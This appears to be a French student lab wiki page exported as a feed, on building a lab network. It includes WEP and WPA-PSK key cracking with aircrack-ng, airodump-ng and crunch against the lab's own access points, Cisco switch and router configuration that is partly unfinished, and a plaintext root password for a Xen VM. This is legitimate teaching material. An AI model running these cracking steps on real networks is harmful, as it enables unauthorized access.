   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
== TEST ==&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51230</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51230"/>
				<updated>2019-11-28T08:55:11Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Attaque d'une installation Wi-fi */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
